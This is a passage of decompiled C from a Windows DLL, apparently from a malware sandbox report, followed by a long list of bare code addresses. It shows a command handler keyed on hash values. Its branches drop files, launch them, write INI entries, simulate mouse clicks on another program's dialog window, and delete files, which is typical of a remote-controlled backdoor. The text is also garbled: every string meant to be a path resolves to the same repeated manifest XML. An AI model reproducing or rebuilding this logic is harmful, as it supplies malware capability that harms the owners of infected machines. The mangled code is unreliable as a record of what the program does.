										_t223 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
										wsprintfA(_t283 + 0x38, "%s%s", _t223,  *(_t264 + 8));
										_t283 = _t283 + 0x10;
										L64:
										_t163 = StrRChrA(_t283 + 0x38, 0, 0x5c);
										_t265 = _t163;
										__eflags = _t265;
										if(_t265 != 0) {
											 *_t265 = 0;
										}
										__imp__SHCreateDirectoryExA(0, _t283 + 0x34, 0);
										__eflags = _t265;
										if(_t265 != 0) {
											 *_t265 = 0x5c;
										}
										__eflags = _t163;
										if(_t163 == 0) {
											L71:
											_push(_t283 + 0x30);
											_push( *((intOrPtr*)( *(_t283 + 0x10) + 4)));
											_t281 = E6F335A00();
											_t283 = _t283 + 8;
											__eflags = _t281;
											if(_t281 == 0) {
												goto L77;
											}
											__eflags = _t271 - 0xb3beafae;
											if(_t271 != 0xb3beafae) {
												__eflags = _t271 - 0x539b9257;
												if(_t271 != 0x539b9257) {
													goto L77;
												}
												_t168 = E6F332750(_t283 + 0x30);
												_t283 = _t283 + 4;
												L76:
												_t281 = _t168;
												goto L77;
											}
											_push(0);
											_push(0);
											_push(1);
											_t168 = E6F334230("open", _t283 + 0x40, 0);
											_t283 = _t283 + 0x18;
											goto L76;
										} else {
											__eflags = _t163 - 0x50;
											if(_t163 == 0x50) {
												goto L71;
											}
											__eflags = _t163 - 0xb7;
											if(_t163 != 0xb7) {
												L77:
												E6F335AF0(_t209, _t281, 0, 0);
												_t280 =  *(_t283 + 0x20);
												_t283 = _t283 + 0x10;
												goto L130;
											}
											goto L71;
										}
									}
									_t169 = PathIsRelativeA(_t283 + 0x30);
									__eflags = _t169;
									if(_t169 == 0) {
										goto L64;
									}
									goto L63;
								}
								_t226 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
								wsprintfA(_t283 + 0x3c, "%s%s%s", _t226,  *((intOrPtr*)( *(_t283 + 0x10) + 8)), ".pdll");
								_t283 = _t283 + 0x14;
								goto L64;
							}
							E6F335AF0(_t209, 2, 0, 0);
							_t283 = _t283 + 0x10;
							goto L130;
						}
						__eflags = _t271 - 0x94a62224;
						if(__eflags > 0) {
							__eflags = _t271 - 0x98666ff0;
							if(_t271 != 0x98666ff0) {
								goto L115;
							}
							 *((intOrPtr*)(_t283 + 0x14)) = GetTickCount();
							_t174 = RtlRandom(_t283 + 0x10);
							_push(".cab");
							_t227 = _t283 + 0x34;
							__eflags =  *(_t283 + 0x18) - 1;
							if( *(_t283 + 0x18) <= 1) {
								_t175 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
								_push( *_t280);
								_push(_t175);
								wsprintfA(_t227, "%s%s%s");
								_t291 = _t283 + 0x14;
							} else {
								_push(_t174);
								_t186 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
								_push(0x75);
								_push(_t186);
								wsprintfA(_t227, "%s%c%lu%s");
								_t291 = _t283 + 0x18;
							}
							__eflags =  *((intOrPtr*)(_t291 + 0x14)) - 1;
							if( *((intOrPtr*)(_t291 + 0x14)) <= 1) {
								L53:
								_t177 = GetFileAttributesA(_t291 + 0x30);
								__eflags = _t177 - 0xffffffff;
								if(_t177 == 0xffffffff) {
									L106:
									E6F335AF0(_t209, 0, 0, 0);
									_t283 = _t291 + 0x10;
									goto L130;
								}
								goto L54;
							} else {
								_push(_t291 + 0x30);
								_push( *((intOrPtr*)(_t280 + 4)));
								_t185 = E6F335A00();
								_t291 = _t291 + 8;
								__eflags = _t185;
								if(_t185 != 0) {
									L54:
									_t254 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
									_t180 = E6F332DC0(_t291 + 0x38, _t254, 1);
									_t283 = _t291 + 0xc;
									__eflags = _t180;
									if(_t180 != 0) {
										E6F335AF0(_t209, 1, 0, 0);
										E6F335060(5, 1, 0);
										_t283 = _t283 + 0x1c;
									}
									DeleteFileA(_t283 + 0x30);
									goto L130;
								}
								goto L53;
							}
						}
						if(__eflags == 0) {
							goto L57;
						}
						__eflags = _t271 - 0x5d22927c;
						if(_t271 == 0x5d22927c) {
							 *(_t283 + 0x1c) = GetTickCount();
							wsprintfA(_t283 + 0x24, "%lu", RtlRandom(_t283 + 0x1c));
							_t256 = M6F3404CC; // 0x99d818
							_t283 = _t283 + 0xc;
							_t257 = M6F3404F0; // 0x998d58
							 *(_t283 + 0x20) = 0x6467;
							 *((char*)(_t283 + 0x22)) = 0;
							_t193 = WritePrivateProfileStringA(_t257, _t283 + 0x18, _t283 + 0x24, _t256);
							__eflags = _t193;
							if(_t193 != 0) {
								goto L107;
							}
							goto L106;
						}
						__eflags = _t271 - 0x876bcf36;
						if(_t271 == 0x876bcf36) {
							goto L13;
						}
						E6F335AF0(_t209, 4, 0, 0);
						_t283 = _t283 + 0x10;
						goto L130;
					}
					if(_t298 == 0) {
						goto L57;
					}
					_t299 = _t271 - 0x2a4ba2d1;
					if(_t299 > 0) {
						__eflags = _t271 - 0x2f1f4648;
						if(_t271 == 0x2f1f4648) {
							goto L13;
						}
						__eflags = _t271 - 0x4231ab60;
						if(_t271 == 0x4231ab60) {
							L37:
							_t258 =  *0x6f340398; // 0x0
							PostMessageA(GetDlgItem(_t258, 0x4e83), 0x111, 0x9cb6, 0);
							_t197 =  *0x6f34039c; // 0x0
							PostMessageA(_t197, 0x201, 1, 0x490017);
							Sleep(0x64);
							_t232 =  *0x6f34039c; // 0x0
							PostMessageA(_t232, 0x202, 0, 0x490017);
							Sleep(0x7d0);
							E6F335AF0(_t209, 1, 0, 0);
							_t283 = _t283 + 0x10;
							goto L130;
						}
						__eflags = _t271 - 0x4779d712;
						if(_t271 == 0x4779d712) {
							goto L13;
						}
						E6F335AF0(_t209, 4, 0, 0);
						_t283 = _t283 + 0x10;
						goto L130;
					}
					if(_t299 == 0) {
						_t259 =  *((intOrPtr*)(_t283 + 0x14));
						__eflags = _t259 - 2;
						if(_t259 >= 2) {
							_t202 =  *((intOrPtr*)(_t280 + 4));
							_t233 =  *_t202;
							__eflags = _t233 - 0x69;
							if(_t233 != 0x69) {
								L21:
								__eflags = _t233 - 0x72;
								if(_t233 != 0x72) {
									goto L117;
								}
								__eflags =  *((char*)(_t202 + 1));
								if( *((char*)(_t202 + 1)) != 0) {
									goto L117;
								}
								_t234 = 0;
								__eflags = 0;
								L24:
								__eflags = _t259 - 2;
								if(_t259 <= 2) {
									L28:
									_t203 = 0;
									__eflags = 0;
									L29:
									_push(_t203);
									_push(_t234);
									_t204 = E6F3344D0(_t209, _t262);
									_t291 = _t283 + 8;
									__eflags = _t204;
									if(_t204 == 0) {
										goto L106;
									}
									_t279 = 5;
									do {
										Sleep(0x3e8);
										_t279 = _t279 - 1;
										__eflags = _t279;
									} while (_t279 != 0);
									E6F335060(5, 1, _t279);
									_t283 = _t291 + 0xc;
									goto L130;
								}
								_t206 =  *((intOrPtr*)(_t280 + 8));
								__eflags =  *_t206 - 0x66;
								if( *_t206 != 0x66) {
									goto L28;
								}
								__eflags =  *((char*)(_t206 + 1));
								if( *((char*)(_t206 + 1)) != 0) {
									goto L28;
								}
								_t203 = 1;
								goto L29;
							}
							__eflags =  *((char*)(_t202 + 1));
							if( *((char*)(_t202 + 1)) != 0) {
								goto L21;
							}
							_t234 = 1;
							goto L24;
						} else {
							E6F335AF0(_t209, 2, 0, 0);
							_t283 = _t283 + 0x10;
							goto L130;
						}
					}
					if(_t271 == 0x76a0ce1) {
						E6F3352B0(_t280, 0);
						_t283 = _t283 + 4;
						goto L130;
					}
					if(_t271 == 0x190cb7c3) {
						goto L37;
					}
					if(_t271 != 0x2965d6c5) {
						goto L115;
					}
					goto L13;
				}
			}


































































                                                                                                                        0x6f335b47
                                                                                                                        0x6f335b5a
                                                                                                                        0x6f335b73
                                                                                                                        0x6f335b75
                                                                                                                        0x6f335b78
                                                                                                                        0x6f335b7e
                                                                                                                        0x6f336432
                                                                                                                        0x6f336432
                                                                                                                        0x6f336436
                                                                                                                        0x6f33643b
                                                                                                                        0x6f336444
                                                                                                                        0x6f336444
                                                                                                                        0x6f336453
                                                                                                                        0x6f336455
                                                                                                                        0x6f33645a
                                                                                                                        0x6f336462
                                                                                                                        0x6f336462
                                                                                                                        0x6f33646a
                                                                                                                        0x6f336478
                                                                                                                        0x6f336478
                                                                                                                        0x6f335b89
                                                                                                                        0x6f33641f
                                                                                                                        0x6f336420
                                                                                                                        0x00000000
                                                                                                                        0x6f33642c
                                                                                                                        0x6f335b93
                                                                                                                        0x6f335b9c
                                                                                                                        0x6f335ba0
                                                                                                                        0x6f335ba8
                                                                                                                        0x6f336417
                                                                                                                        0x00000000
                                                                                                                        0x6f33641c
                                                                                                                        0x00000000
                                                                                                                        0x6f335bae
                                                                                                                        0x6f335bae
                                                                                                                        0x6f335bbc
                                                                                                                        0x6f335bc2
                                                                                                                        0x6f335bc8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335bd8
                                                                                                                        0x6f335be8
                                                                                                                        0x6f335bee
                                                                                                                        0x6f335bf4
                                                                                                                        0x6f335da5
                                                                                                                        0x6f335dab
                                                                                                                        0x6f336076
                                                                                                                        0x6f33607c
                                                                                                                        0x6f3362d0
                                                                                                                        0x6f3362d6
                                                                                                                        0x6f335c2e
                                                                                                                        0x6f335c33
                                                                                                                        0x6f336394
                                                                                                                        0x6f33639a
                                                                                                                        0x6f33639d
                                                                                                                        0x6f3363a3
                                                                                                                        0x6f3363b9
                                                                                                                        0x6f3363b9
                                                                                                                        0x6f3363be
                                                                                                                        0x6f3363be
                                                                                                                        0x6f3363c4
                                                                                                                        0x6f3363d5
                                                                                                                        0x6f3363d5
                                                                                                                        0x6f3363d5
                                                                                                                        0x6f3363d7
                                                                                                                        0x6f3363d7
                                                                                                                        0x6f3363d9
                                                                                                                        0x6f3363da
                                                                                                                        0x6f3363f2
                                                                                                                        0x6f3363f7
                                                                                                                        0x00000000
                                                                                                                        0x6f3363f7
                                                                                                                        0x6f3363c6
                                                                                                                        0x6f3363cc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3363ce
                                                                                                                        0x00000000
                                                                                                                        0x6f3363ce
                                                                                                                        0x6f3363a5
                                                                                                                        0x6f3363ab
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3363ad
                                                                                                                        0x6f3363b3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3363b5
                                                                                                                        0x00000000
                                                                                                                        0x6f335c39
                                                                                                                        0x6f335c40
                                                                                                                        0x6f335c45
                                                                                                                        0x6f3363fa
                                                                                                                        0x6f336408
                                                                                                                        0x00000000
                                                                                                                        0x6f336408
                                                                                                                        0x6f335c33
                                                                                                                        0x6f3362dc
                                                                                                                        0x6f3362e2
                                                                                                                        0x6f336377
                                                                                                                        0x6f336379
                                                                                                                        0x6f33637b
                                                                                                                        0x6f33605f
                                                                                                                        0x6f336067
                                                                                                                        0x6f336068
                                                                                                                        0x6f336069
                                                                                                                        0x6f33606e
                                                                                                                        0x00000000
                                                                                                                        0x6f33606e
                                                                                                                        0x6f3362e8
                                                                                                                        0x6f3362ee
                                                                                                                        0x6f336304
                                                                                                                        0x6f336309
                                                                                                                        0x6f336322
                                                                                                                        0x6f33633d
                                                                                                                        0x6f336347
                                                                                                                        0x6f336348
                                                                                                                        0x6f33634e
                                                                                                                        0x6f336361
                                                                                                                        0x6f33636a
                                                                                                                        0x6f33636f
                                                                                                                        0x00000000
                                                                                                                        0x6f33636f
                                                                                                                        0x6f33630b
                                                                                                                        0x6f336312
                                                                                                                        0x6f336317
                                                                                                                        0x00000000
                                                                                                                        0x6f336317
                                                                                                                        0x6f3362f0
                                                                                                                        0x6f3362f7
                                                                                                                        0x6f3362fc
                                                                                                                        0x00000000
                                                                                                                        0x6f3362fc
                                                                                                                        0x6f336082
                                                                                                                        0x6f336291
                                                                                                                        0x6f336291
                                                                                                                        0x6f336296
                                                                                                                        0x6f3362bd
                                                                                                                        0x6f3362c3
                                                                                                                        0x6f3362c8
                                                                                                                        0x00000000
                                                                                                                        0x6f3362c8
                                                                                                                        0x6f336298
                                                                                                                        0x6f33629b
                                                                                                                        0x6f33629e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3362a0
                                                                                                                        0x6f3362a4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3362b0
                                                                                                                        0x6f3362b5
                                                                                                                        0x00000000
                                                                                                                        0x6f3362b5
                                                                                                                        0x6f336088
                                                                                                                        0x6f33608e
                                                                                                                        0x6f3361bd
                                                                                                                        0x6f3361c2
                                                                                                                        0x6f3361c7
                                                                                                                        0x6f3361ee
                                                                                                                        0x6f3361f3
                                                                                                                        0x6f3361f4
                                                                                                                        0x6f3361ff
                                                                                                                        0x6f336205
                                                                                                                        0x6f336219
                                                                                                                        0x6f33621e
                                                                                                                        0x6f3361c9
                                                                                                                        0x6f3361c9
                                                                                                                        0x6f3361cf
                                                                                                                        0x6f3361de
                                                                                                                        0x6f3361e3
                                                                                                                        0x6f3361e3
                                                                                                                        0x00000000
                                                                                                                        0x6f3361c7
                                                                                                                        0x6f336094
                                                                                                                        0x6f33609a
                                                                                                                        0x6f33614f
                                                                                                                        0x6f336154
                                                                                                                        0x6f336180
                                                                                                                        0x6f336197
                                                                                                                        0x6f3361b0
                                                                                                                        0x6f3361b5
                                                                                                                        0x6f336156
                                                                                                                        0x6f336156
                                                                                                                        0x6f33615d
                                                                                                                        0x6f336170
                                                                                                                        0x6f336175
                                                                                                                        0x6f336175
                                                                                                                        0x00000000
                                                                                                                        0x6f336154
                                                                                                                        0x6f3360a0
                                                                                                                        0x6f3360a6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3360ac
                                                                                                                        0x6f3360b5
                                                                                                                        0x6f3360bb
                                                                                                                        0x6f3360bd
                                                                                                                        0x6f33613b
                                                                                                                        0x6f336142
                                                                                                                        0x6f336147
                                                                                                                        0x00000000
                                                                                                                        0x6f336147
                                                                                                                        0x6f3360bf
                                                                                                                        0x6f3360cc
                                                                                                                        0x6f3360d2
                                                                                                                        0x6f3360d4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3360ed
                                                                                                                        0x6f3360f1
                                                                                                                        0x6f3360f9
                                                                                                                        0x6f3360ff
                                                                                                                        0x6f336101
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33610b
                                                                                                                        0x6f336110
                                                                                                                        0x6f336113
                                                                                                                        0x6f336117
                                                                                                                        0x6f336119
                                                                                                                        0x6f33611c
                                                                                                                        0x6f33611f
                                                                                                                        0x6f336121
                                                                                                                        0x6f336125
                                                                                                                        0x6f336127
                                                                                                                        0x6f336127
                                                                                                                        0x6f336127
                                                                                                                        0x6f336125
                                                                                                                        0x6f33611f
                                                                                                                        0x6f33612d
                                                                                                                        0x6f336133
                                                                                                                        0x6f336135
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336135
                                                                                                                        0x6f335db1
                                                                                                                        0x6f336059
                                                                                                                        0x6f33605b
                                                                                                                        0x6f33605d
                                                                                                                        0x00000000
                                                                                                                        0x6f33605d
                                                                                                                        0x6f335db7
                                                                                                                        0x6f335dbd
                                                                                                                        0x6f336022
                                                                                                                        0x6f336028
                                                                                                                        0x6f33604c
                                                                                                                        0x6f336051
                                                                                                                        0x00000000
                                                                                                                        0x6f336051
                                                                                                                        0x6f33602a
                                                                                                                        0x6f336030
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336032
                                                                                                                        0x6f336038
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33603e
                                                                                                                        0x6f336040
                                                                                                                        0x6f336042
                                                                                                                        0x00000000
                                                                                                                        0x6f336042
                                                                                                                        0x6f335dc3
                                                                                                                        0x6f335edb
                                                                                                                        0x6f335edb
                                                                                                                        0x6f335ee0
                                                                                                                        0x6f335ef6
                                                                                                                        0x6f335ef8
                                                                                                                        0x6f335efd
                                                                                                                        0x6f335f03
                                                                                                                        0x6f335f2e
                                                                                                                        0x6f335f40
                                                                                                                        0x6f335f46
                                                                                                                        0x6f335f48
                                                                                                                        0x6f335f59
                                                                                                                        0x6f335f5c
                                                                                                                        0x6f335f6e
                                                                                                                        0x6f335f74
                                                                                                                        0x6f335f77
                                                                                                                        0x6f335f80
                                                                                                                        0x6f335f86
                                                                                                                        0x6f335f88
                                                                                                                        0x6f335f8a
                                                                                                                        0x6f335f8c
                                                                                                                        0x6f335f8c
                                                                                                                        0x6f335f98
                                                                                                                        0x6f335f9e
                                                                                                                        0x6f335fa0
                                                                                                                        0x6f335fa2
                                                                                                                        0x6f335fa2
                                                                                                                        0x6f335fa5
                                                                                                                        0x6f335fa7
                                                                                                                        0x6f335fb5
                                                                                                                        0x6f335fc0
                                                                                                                        0x6f335fc1
                                                                                                                        0x6f335fc7
                                                                                                                        0x6f335fc9
                                                                                                                        0x6f335fcc
                                                                                                                        0x6f335fce
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335fd0
                                                                                                                        0x6f335fd6
                                                                                                                        0x6f335ff4
                                                                                                                        0x6f335ffa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336001
                                                                                                                        0x6f336006
                                                                                                                        0x6f336009
                                                                                                                        0x6f336009
                                                                                                                        0x00000000
                                                                                                                        0x6f336009
                                                                                                                        0x6f335fd8
                                                                                                                        0x6f335fda
                                                                                                                        0x6f335fdc
                                                                                                                        0x6f335fea
                                                                                                                        0x6f335fef
                                                                                                                        0x00000000
                                                                                                                        0x6f335fa9
                                                                                                                        0x6f335fa9
                                                                                                                        0x6f335fac
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335fae
                                                                                                                        0x6f335fb3
                                                                                                                        0x6f33600b
                                                                                                                        0x6f336011
                                                                                                                        0x6f336016
                                                                                                                        0x6f33601a
                                                                                                                        0x00000000
                                                                                                                        0x6f33601a
                                                                                                                        0x00000000
                                                                                                                        0x6f335fb3
                                                                                                                        0x6f335fa7
                                                                                                                        0x6f335f4f
                                                                                                                        0x6f335f55
                                                                                                                        0x6f335f57
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335f57
                                                                                                                        0x6f335f0c
                                                                                                                        0x6f335f23
                                                                                                                        0x6f335f29
                                                                                                                        0x00000000
                                                                                                                        0x6f335f29
                                                                                                                        0x6f335ee9
                                                                                                                        0x6f335eee
                                                                                                                        0x00000000
                                                                                                                        0x6f335eee
                                                                                                                        0x6f335dc9
                                                                                                                        0x6f335dcf
                                                                                                                        0x6f335e03
                                                                                                                        0x6f335e09
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335e1a
                                                                                                                        0x6f335e1e
                                                                                                                        0x6f335e29
                                                                                                                        0x6f335e2e
                                                                                                                        0x6f335e32
                                                                                                                        0x6f335e36
                                                                                                                        0x6f335e55
                                                                                                                        0x6f335e5a
                                                                                                                        0x6f335e5b
                                                                                                                        0x6f335e62
                                                                                                                        0x6f335e68
                                                                                                                        0x6f335e38
                                                                                                                        0x6f335e38
                                                                                                                        0x6f335e39
                                                                                                                        0x6f335e3e
                                                                                                                        0x6f335e40
                                                                                                                        0x6f335e47
                                                                                                                        0x6f335e4d
                                                                                                                        0x6f335e4d
                                                                                                                        0x6f335e6b
                                                                                                                        0x6f335e6f
                                                                                                                        0x6f335e86
                                                                                                                        0x6f335e8b
                                                                                                                        0x6f335e91
                                                                                                                        0x6f335e94
                                                                                                                        0x6f33627d
                                                                                                                        0x6f336284
                                                                                                                        0x6f336289
                                                                                                                        0x00000000
                                                                                                                        0x6f336289
                                                                                                                        0x00000000
                                                                                                                        0x6f335e71
                                                                                                                        0x6f335e78
                                                                                                                        0x6f335e79
                                                                                                                        0x6f335e7a
                                                                                                                        0x6f335e7f
                                                                                                                        0x6f335e82
                                                                                                                        0x6f335e84
                                                                                                                        0x6f335e9a
                                                                                                                        0x6f335e9a
                                                                                                                        0x6f335ea7
                                                                                                                        0x6f335eac
                                                                                                                        0x6f335eaf
                                                                                                                        0x6f335eb1
                                                                                                                        0x6f335eb9
                                                                                                                        0x6f335ec3
                                                                                                                        0x6f335ec8
                                                                                                                        0x6f335ec8
                                                                                                                        0x6f335ed0
                                                                                                                        0x00000000
                                                                                                                        0x6f335ed0
                                                                                                                        0x00000000
                                                                                                                        0x6f335e84
                                                                                                                        0x6f335e6f
                                                                                                                        0x6f335dd1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335dd7
                                                                                                                        0x6f335ddd
                                                                                                                        0x6f33622c
                                                                                                                        0x6f336246
                                                                                                                        0x6f33624c
                                                                                                                        0x6f336252
                                                                                                                        0x6f336256
                                                                                                                        0x6f336267
                                                                                                                        0x6f33626e
                                                                                                                        0x6f336273
                                                                                                                        0x6f336279
                                                                                                                        0x6f33627b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33627b
                                                                                                                        0x6f335de3
                                                                                                                        0x6f335de9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335df6
                                                                                                                        0x6f335dfb
                                                                                                                        0x00000000
                                                                                                                        0x6f335dfb
                                                                                                                        0x6f335bfa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335c00
                                                                                                                        0x6f335c06
                                                                                                                        0x6f335cfc
                                                                                                                        0x6f335d02
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335d08
                                                                                                                        0x6f335d0e
                                                                                                                        0x6f335d30
                                                                                                                        0x6f335d30
                                                                                                                        0x6f335d55
                                                                                                                        0x6f335d57
                                                                                                                        0x6f335d69
                                                                                                                        0x6f335d73
                                                                                                                        0x6f335d75
                                                                                                                        0x6f335d88
                                                                                                                        0x6f335d8f
                                                                                                                        0x6f335d98
                                                                                                                        0x6f335d9d
                                                                                                                        0x00000000
                                                                                                                        0x6f335d9d
                                                                                                                        0x6f335d10
                                                                                                                        0x6f335d16
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335d23
                                                                                                                        0x6f335d28
                                                                                                                        0x00000000
                                                                                                                        0x6f335d28
                                                                                                                        0x6f335c0c
                                                                                                                        0x6f335c5c
                                                                                                                        0x6f335c60
                                                                                                                        0x6f335c63
                                                                                                                        0x6f335c79
                                                                                                                        0x6f335c7c
                                                                                                                        0x6f335c7e
                                                                                                                        0x6f335c81
                                                                                                                        0x6f335c90
                                                                                                                        0x6f335c90
                                                                                                                        0x6f335c93
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335c99
                                                                                                                        0x6f335c9d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335ca3
                                                                                                                        0x6f335ca3
                                                                                                                        0x6f335ca5
                                                                                                                        0x6f335ca5
                                                                                                                        0x6f335ca8
                                                                                                                        0x6f335cbf
                                                                                                                        0x6f335cbf
                                                                                                                        0x6f335cbf
                                                                                                                        0x6f335cc1
                                                                                                                        0x6f335cc1
                                                                                                                        0x6f335cc2
                                                                                                                        0x6f335cc3
                                                                                                                        0x6f335cc8
                                                                                                                        0x6f335ccb
                                                                                                                        0x6f335ccd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335cd9
                                                                                                                        0x6f335ce0
                                                                                                                        0x6f335ce5
                                                                                                                        0x6f335ce7
                                                                                                                        0x6f335ce7
                                                                                                                        0x6f335ce7
                                                                                                                        0x6f335cef
                                                                                                                        0x6f335cf4
                                                                                                                        0x00000000
                                                                                                                        0x6f335cf4
